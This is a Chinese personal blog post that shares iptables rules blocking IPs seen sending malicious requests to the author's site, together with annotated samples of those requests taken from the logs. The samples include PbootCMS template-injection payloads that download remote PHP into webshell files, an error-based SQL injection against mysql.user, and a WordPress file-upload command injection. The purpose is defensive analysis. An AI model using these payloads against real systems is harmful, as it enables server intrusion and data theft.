Gojira 哥斯拉Gojira 哥斯拉

哥斯拉爱好者的日常
生活相当无趣 我得找点乐子

手动封ip-2 恶意访问样例

2025.03.17 10:55 网络技术 210人看过 8个评论

gojira.net

以下是最近一个月的封ip记录,纯手工检验,可直接使用。
Linux中直接复制下面内容后执行就可以了,前提:安装了iptables

#2025.03.17  
iptables -I INPUT -s 95.173.223.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.186.14.4 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 3.110.94.228 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 40.84.25.63 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 43.138.149.101 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 111.202.19.189 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 149.130.221.159 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 61.130.144.139 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 43.139.158.52 -p tcp -m multiport --dports 80,443 -j DROP

#2025.03.14
iptables -I INPUT -s 183.47.105.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 111.68.1.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 172.245.62.102 -p tcp -m multiport --dports 80,443 -j DROP

#2025.03.13
iptables -I INPUT -s 180.163.28.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 180.163.29.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 13.74.63.93 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 13.72.65.38 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 159.75.241.57 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-11
iptables -I INPUT -s 48.210.69.52 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 112.213.116.16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 183.47.105.49 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-10
iptables -I INPUT -s 52.237.232.163 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 112.49.131.157 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.46.185.167 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 38.153.43.97 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 180.163.28.55 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 205.185.118.70 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-09
iptables -I INPUT -s 134.122.133.114 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 124.64.192.244 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.215.146.147 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-07
iptables -I INPUT -s 20.42.219.65 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.169.94.7 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 180.163.30.76 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.169.89.233 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 172.71.8.35 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 20.42.219.65 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-06
iptables -I INPUT -s 171.34.10.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.169.71.29 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-05
iptables -I INPUT -s 110.40.77.120 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 204.10.194.0/24 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-04
iptables -I INPUT -s 188.213.128.195 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 143.92.34.154 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 158.160.123.107 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 154.221.22.39 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 107.189.29.193 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 209.141.53.247 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 198.98.51.208 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.233.9.190 -p tcp -m multiport --dports 80,443 -j DROP

#2025-03-03
iptables -I INPUT -s 13.79.156.84 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 13.79.157.149 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 13.94.67.46 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 64.227.96.61 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.149.200.131 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.252.147.138 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 107.189.29.193 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 138.197.27.117 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-28
iptables -I INPUT -s 188.166.15.247 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 13.69.217.188 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-27
iptables -I INPUT -s 193.41.206.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.164.121.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.85.190.122 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 39.191.221.18 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 196.242.21.195 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 152.53.18.75 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s  49.7.149.3 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s  111.13.118.11 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-26
iptables -I INPUT -s 129.213.94.27 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 59.115.149.24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 154.9.254.5 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 116.213.38.122 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 62.234.94.31 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-25
iptables -I INPUT -s 110.40.50.194 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.164.121.233 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 42.51.46.112 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 23.248.224.154 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-24
iptables -I INPUT -s 172.167.122.28 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 172.166.182.120 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 149.130.215.43 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 18.144.1.242 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 39.180.64.23 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.164.218.141 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 52.164.121.210 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 193.41.206.202 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-22
iptables -I INPUT -s 103.186.215.24 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-21
iptables -I INPUT -s 45.61.161.87 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 185.34.145.36 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 223.92.17.3 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 96.43.98.20 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 183.144.121.20 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-20
iptables -I INPUT -s 220.177.253.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 116.202.246.181 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 202.79.173.132 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-19
iptables -I INPUT -s 14.128.63.0/24 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 132.145.140.179 -p tcp -m multiport --dports 80,443 -j DROP

#2025-02-18
iptables -I INPUT -s 172.167.120.213 -p tcp -m multiport --dports 80,443 -j DROP

上一期封ip

恶意使用样例

96.43.98.20 POST   /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue
利用服务器端模板引擎的漏洞来执行任意代码
usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3)))


45.61.161.87   POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20'cmFnYTNkYXdsZWRpYWppaG5heWE='%20%7C%20base64%20--decode%20&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9


185.34.145.36   GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=s6.php&t2=file_get_contents&t3=http://www.gsxiaomiao.com/html/1.txt
恶意的模板代码 %7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D
get(t) 的值是 file_put_contents,它将被作为函数名执行。
file_put_contents 函数将 file_get_contents(http://www.gsxiaomiao.com/html/1.txt) 的结果写入 s6.php 文件。


183.144.121.20   GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
恶意 SQL 查询
) and (select 1 from (select count(*),concat((select concat(user,0x3a,md5(1234),0x3a) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#


GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9tYTEudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=1
解码后的真实内容:
<?php
file_put_contents('./core/basic/fun.php', file_get_contents('http://d.sogoud.vip/txt/ma1.txt'));
echo 'temp111888';
unlink(__FILE__);


GET /index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
PD9waHAgcGhwaW5mbygpOz8+ 解码的结果是:<?php phpinfo();?> 查看php详细信息的,含有部分服务器相关信息。

以上出现的、被调用的网址,大多是被入侵后的受害者。

GOJIRA.NET原创文章未经允许不得转载! 当前页面:Gojira 哥斯拉 » 手动封ip-2 恶意访问样例
iptables 手动封ip 恶意入侵请求 恶意请求 入侵请求
高飞

高飞

高杰仁,第一代哥斯拉爱好者

评论 8

  1. 最近又活跃起来了呀

    拾风 2025.03.24 13:13:54 回复

    • 因为想你们这些老博友。

      高飞 博 主 2025.03.24 17:00:54 回复

  2. 我记得好像可以自己搭建waf来着,然后把这些ip导入,我的方法是宝塔开启nginx防火墙,还有failban,会自动把恶意超出频次的给自动拉黑,

    Jeffer.Z 2025.03.19 20:22:39 回复

    • 手动封ip-1 中有讲过不用waf、宝塔之类的原因。

      高飞 博 主 2025.03.24 17:00:23 回复

  3. 基本上都是黑产肉鸡,封不封都是那么回事。

    石樱灯笼 L1 初出茅庐 2025.03.19 01:12:21 回复

    • 封了还是很有用的,以前每分钟突发请求几千上万是常事,现在基本稳定了,一天都很平缓。

      高飞 博 主 2025.03.19 10:25:14 回复

  4. 我最近把日志拉库里,也手动封了不少ip

    萧瑟 L2 小有名气 2025.03.17 14:57:00 回复

    • 拉库里?什么库?教教我。

      高飞 博 主 2025.03.19 10:23:33 回复

相关日志